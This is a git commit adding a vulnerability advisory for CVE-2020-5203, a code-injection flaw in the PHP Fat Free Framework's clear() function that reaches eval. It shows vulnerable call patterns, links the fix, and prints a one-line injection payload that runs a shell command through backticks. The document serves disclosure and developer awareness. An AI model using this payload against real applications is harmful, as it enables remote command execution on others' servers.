Create CVE-2020-5203.md

fgsec · May 8, 2020 · 2873f1a · 2873f1a
1 parent 935a9c1
commit 2873f1a
Showing 1 changed file with 35 additions and 0 deletions.
diff --git a/CVE-2020-5203.md b/CVE-2020-5203.md
@@ -0,0 +1,35 @@
+# CVE-2020-5203
+
+This vulnerability was found during a penetration test for a company that uses the PHP Fat Free Framework. Responsible disclosure guidelines were followed, where a fix was issued by the company that hired me and the group behind the framework.
+
+## How it Works
+
+The exploitation depends on how the developer choose to use the vulnerable "Clear" function. For it to work, untrusted content must be passed to the function without any sanitization. 
+
+Take the examples:
+
+	<?php
+		... includes
+		$input = $_GET['session'];
+		$f3->clear($input); // vulnerable
+		$f3->clear($_GET['session']); // vulnerable
+		$f3->clear("SESSION.".$_GET['session']); // vulnerable
+		$f3->clear("SESSION.ABC"); // NOT vulnerable
+	?>
+
+During my pentest, the application was setting session variables names with user controlled input, as one of the examples.
+
+The vulnerability exists because the function eventually passes the input to an eval, allowing malicious actors to "break" the structure to inject malicious code.
+
+The [FIX](https://github.com/bcosca/fatfree-core/commit/dae95a0baf3963a9ef87c17cee52f78f77e21829) for this vulnerability can help you better understand the flaw.
+
+## Exploit
+
+There are a few ways to exploit the eval for command execution, this one uses the backtick operator and breaks the execution format for our own code:
+
+	0);echo `id`;print(''
+
+
+Thats it. 
+
+Developers, remember that a framework is code as anything else. Don't think it won't have vulnerabilities just because a lot of people may use it, or just because it is open-source.